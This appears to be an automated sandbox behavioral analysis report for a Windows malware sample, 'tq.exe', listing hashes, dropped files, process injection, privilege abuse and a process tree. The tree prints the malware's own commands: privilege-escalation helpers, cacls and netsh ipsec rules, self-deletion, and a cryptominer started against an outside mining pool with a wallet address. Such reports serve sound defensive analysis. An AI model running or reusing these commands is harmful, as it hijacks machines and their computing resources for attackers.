Analysis
-
max time kernel
55s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-05-2021 13:02
Static task
static1
Behavioral task
behavioral1
Sample
tq.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
tq.exe
Resource
win10v20210408
General
-
Target
tq.exe
-
Size
418KB
-
MD5
e8450e61f061fd90d74507eb04845ecd
-
SHA1
f344f20c57f9cb01ea3166f3404336da1519a832
-
SHA256
0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
-
SHA512
d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 3348 created 2732 3348 svchost.exe MS19.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exepid process 2732 MS19.exe 3936 MS20.exe 3752 MSSQLH.exe 1384 RunDllExe.exe 196 RunDllExe.exe 3828 x64.exe 2836 wudfhosts.exe -
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\x64.exe upx C:\Users\Admin\AppData\Local\Temp\x64.exe upx C:\Windows\Cursors\wudfhosts.exe upx C:\Windows\Cursors\WUDFhosts.exe upx -
Loads dropped DLL 2 IoCs
Processes:
svchost.exepid process 1980 2140 svchost.exe -
Drops file in System32 directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
RunDllExe.exeRunDllExe.exesvchost.exedescription pid process target process PID 196 set thread context of 1524 196 RunDllExe.exe svchost.exe PID 1384 set thread context of 1340 1384 RunDllExe.exe svchost.exe PID 2140 set thread context of 2912 2140 svchost.exe svchost.exe -
Drops file in Windows directory 17 IoCs
Processes:
RunDllExe.exex64.exeMSSQLH.exesvchost.exeRunDllExe.exedescription ioc process File opened for modification C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe File created C:\Windows\Help\active_desktop_render.dll x64.exe File opened for modification C:\Windows\Cursors\WUDFhosts.exe x64.exe File created C:\Windows\Logs\RunDllExe.exe MSSQLH.exe File created C:\Windows\MpMgSvc.dll MSSQLH.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File created C:\Windows\Cursors\WUDFhosts.exe x64.exe File created C:\Windows\Help\active_desktop_render_New.dll svchost.exe File created C:\Windows\Logs\RunDllExe.dll MSSQLH.exe File created C:\Windows\Logs\Vers.txt MSSQLH.exe File created C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe.dll RunDllExe.exe File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File opened for modification C:\Windows\Help\active_desktop_render.dll svchost.exe File created C:\Windows\Logs\RunDllExe MSSQLH.exe -
Modifies data under HKEY_USERS 8 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
MSSQLH.exesvchost.exepid process 3752 MSSQLH.exe 3752 MSSQLH.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe 2912 svchost.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
MS19.exesvchost.exeMS20.exeMSSQLH.exesvchost.exewudfhosts.exedescription pid process Token: SeImpersonatePrivilege 2732 MS19.exe Token: SeAssignPrimaryTokenPrivilege 2732 MS19.exe Token: SeTcbPrivilege 3348 svchost.exe Token: SeTcbPrivilege 3348 svchost.exe Token: SeImpersonatePrivilege 3936 MS20.exe Token: SeRestorePrivilege 3752 MSSQLH.exe Token: SeBackupPrivilege 3752 MSSQLH.exe Token: SeSecurityPrivilege 3752 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3752 MSSQLH.exe Token: SeRestorePrivilege 3752 MSSQLH.exe Token: SeBackupPrivilege 3752 MSSQLH.exe Token: SeSecurityPrivilege 3752 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3752 MSSQLH.exe Token: SeRestorePrivilege 3752 MSSQLH.exe Token: SeBackupPrivilege 3752 MSSQLH.exe Token: SeSecurityPrivilege 3752 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3752 MSSQLH.exe Token: SeRestorePrivilege 3752 MSSQLH.exe Token: SeBackupPrivilege 3752 MSSQLH.exe Token: SeSecurityPrivilege 3752 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3752 MSSQLH.exe Token: SeRestorePrivilege 3752 MSSQLH.exe Token: SeBackupPrivilege 3752 MSSQLH.exe Token: SeSecurityPrivilege 3752 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3752 MSSQLH.exe Token: SeRestorePrivilege 3752 MSSQLH.exe Token: SeBackupPrivilege 3752 MSSQLH.exe Token: SeSecurityPrivilege 3752 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3752 MSSQLH.exe Token: SeRestorePrivilege 3752 MSSQLH.exe Token: SeBackupPrivilege 3752 MSSQLH.exe Token: SeSecurityPrivilege 3752 MSSQLH.exe Token: SeTakeOwnershipPrivilege 3752 MSSQLH.exe Token: SeRestorePrivilege 2912 svchost.exe Token: SeBackupPrivilege 2912 svchost.exe Token: SeSecurityPrivilege 2912 svchost.exe Token: SeTakeOwnershipPrivilege 2912 svchost.exe Token: SeLockMemoryPrivilege 2836 wudfhosts.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exepid process 2840 tq.exe 3752 MSSQLH.exe 1384 RunDllExe.exe 196 RunDllExe.exe 3828 x64.exe 2140 svchost.exe 2912 svchost.exe 2912 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exedescription pid process target process PID 2840 wrote to memory of 2732 2840 tq.exe MS19.exe PID 2840 wrote to memory of 2732 2840 tq.exe MS19.exe PID 2840 wrote to memory of 3936 2840 tq.exe MS20.exe PID 2840 wrote to memory of 3936 2840 tq.exe MS20.exe PID 2840 wrote to memory of 3752 2840 tq.exe MSSQLH.exe PID 2840 wrote to memory of 3752 2840 tq.exe MSSQLH.exe PID 2840 wrote to memory of 3752 2840 tq.exe MSSQLH.exe PID 3752 wrote to memory of 2776 3752 MSSQLH.exe cacls.exe PID 3752 wrote to memory of 2776 3752 MSSQLH.exe cacls.exe PID 3752 wrote to memory of 2776 3752 MSSQLH.exe cacls.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 196 wrote to memory of 1524 196 RunDllExe.exe svchost.exe PID 1384 wrote to memory of 1340 1384 RunDllExe.exe svchost.exe PID 3752 wrote to memory of 3828 3752 MSSQLH.exe x64.exe PID 3752 wrote to memory of 3828 3752 MSSQLH.exe x64.exe PID 3752 wrote to memory of 3828 3752 MSSQLH.exe x64.exe PID 3828 wrote to memory of 3952 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3952 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3952 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3808 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3808 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3808 3828 x64.exe netsh.exe PID 3828 wrote to memory of 1336 3828 x64.exe netsh.exe PID 3828 wrote to memory of 1336 3828 x64.exe netsh.exe PID 3828 wrote to memory of 1336 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2644 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2644 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2644 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2428 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2428 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2428 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3816 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3816 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3816 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2996 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2996 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2996 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3044 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3044 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3044 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3460 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3460 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3460 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3908 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3908 3828 x64.exe netsh.exe PID 3828 wrote to memory of 3908 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2580 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2580 3828 x64.exe netsh.exe PID 3828 wrote to memory of 2580 3828 x64.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tq.exe"C:\Users\Admin\AppData\Local\Temp\tq.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeC:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeC:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeC:\Users\Admin\AppData\Local\Temp\MSSQLH.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\*.exe /e /d system3⤵
-
C:\Users\Admin\AppData\Local\Temp\x64.exex64.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"4⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
\??\c:\windows\syswow64\svchost.exec:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Cursors\wudfhosts.exeC:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Cursors\wudfhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Logs\RunDllExeMD5
509d3832d107461a37868327f06143a0
SHA17a0d9ac45b20476438c189eb1254e01e5b04a94d
SHA256b7dddd6ffbca35e4e2260197e5395c6ac8c926bef591fcd0195e5e90521f58cb
SHA5122b70f5690c38295567e6010ead674f93ea6d6bda6102e37a368df83f7d206b19a6b90d8c8fd5aa82e93681dd936bcbb609f0ac13c457223879426ebbccf03e37
-
C:\Windows\Logs\RunDllExeMD5
509d3832d107461a37868327f06143a0
SHA17a0d9ac45b20476438c189eb1254e01e5b04a94d
SHA256b7dddd6ffbca35e4e2260197e5395c6ac8c926bef591fcd0195e5e90521f58cb
SHA5122b70f5690c38295567e6010ead674f93ea6d6bda6102e37a368df83f7d206b19a6b90d8c8fd5aa82e93681dd936bcbb609f0ac13c457223879426ebbccf03e37
-
C:\Windows\Logs\RunDllExe.dllMD5
5ebe9eba3361ea00cd3031961dc2830f
SHA1afa93aa84ec59b2cd56057dd1ae58a2e451f5d77
SHA2560da702bb6f4d61e940727da8ff67db135632e2d24d0c94c6f5e3927ef3502512
SHA512d501c82b870e2f97e9aadef409e098482c698b16ab1e8abdd8f8b4add6ebe137021511f32285bfa8f923dd4cd195454ef850ecd8f1651c5c891118f50115c4f3
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
C:\Windows\Logs\RunDllExe_New.dllMD5
5ebe9eba3361ea00cd3031961dc2830f
SHA1afa93aa84ec59b2cd56057dd1ae58a2e451f5d77
SHA2560da702bb6f4d61e940727da8ff67db135632e2d24d0c94c6f5e3927ef3502512
SHA512d501c82b870e2f97e9aadef409e098482c698b16ab1e8abdd8f8b4add6ebe137021511f32285bfa8f923dd4cd195454ef850ecd8f1651c5c891118f50115c4f3
-
C:\Windows\Logs\RunDllExe_New.dllMD5
5ebe9eba3361ea00cd3031961dc2830f
SHA1afa93aa84ec59b2cd56057dd1ae58a2e451f5d77
SHA2560da702bb6f4d61e940727da8ff67db135632e2d24d0c94c6f5e3927ef3502512
SHA512d501c82b870e2f97e9aadef409e098482c698b16ab1e8abdd8f8b4add6ebe137021511f32285bfa8f923dd4cd195454ef850ecd8f1651c5c891118f50115c4f3
-
\??\c:\windows\help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Windows\Help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Windows\Logs\RunDllExe.dllMD5
c02d9300deea8aaa42bf5e9c56ddcf29
SHA14c547bab0a92ba6fe77a8bfcef56faf5f1a0ad89
SHA25654dd6ca2fab1eab858fa8d06fa095a943d6d1ff601c71a4c6af5e9061019f9d5
SHA512c2537d3bf63bf67ac0e844fc65285bcd444896201fd14add9bef7bab054eb93269248ecfa752268e3f692bb8ea3bc8d861e40f4ba5f63b5428f8f75a204315e1
-
memory/1336-154-0x0000000000000000-mapping.dmp
-
memory/1340-137-0x00000000004054EC-mapping.dmp
-
memory/1340-132-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1524-147-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1524-130-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1524-128-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1524-136-0x00000000004054EC-mapping.dmp
-
memory/2428-156-0x0000000000000000-mapping.dmp
-
memory/2580-162-0x0000000000000000-mapping.dmp
-
memory/2644-155-0x0000000000000000-mapping.dmp
-
memory/2732-114-0x0000000000000000-mapping.dmp
-
memory/2776-127-0x0000000000000000-mapping.dmp
-
memory/2836-176-0x0000000000000000-mapping.dmp
-
memory/2836-178-0x000001CEFA420000-0x000001CEFA430000-memory.dmpFilesize
64KB
-
memory/2836-179-0x000001CEFA440000-0x000001CEFA450000-memory.dmpFilesize
64KB
-
memory/2836-180-0x000001CEFA450000-0x000001CEFA460000-memory.dmpFilesize
64KB
-
memory/2836-181-0x000001CEFA460000-0x000001CEFA470000-memory.dmpFilesize
64KB
-
memory/2912-171-0x0000000010072B6D-mapping.dmp
-
memory/2912-174-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2912-166-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2912-167-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2912-168-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2912-169-0x0000000010000000-0x000000001010C000-memory.dmpFilesize
1.0MB
-
memory/2996-158-0x0000000000000000-mapping.dmp
-
memory/3044-159-0x0000000000000000-mapping.dmp
-
memory/3460-160-0x0000000000000000-mapping.dmp
-
memory/3752-164-0x0000000000000000-mapping.dmp
-
memory/3752-120-0x0000000000000000-mapping.dmp
-
memory/3808-153-0x0000000000000000-mapping.dmp
-
memory/3816-157-0x0000000000000000-mapping.dmp
-
memory/3828-149-0x0000000000000000-mapping.dmp
-
memory/3908-161-0x0000000000000000-mapping.dmp
-
memory/3936-117-0x0000000000000000-mapping.dmp
-
memory/3952-152-0x0000000000000000-mapping.dmp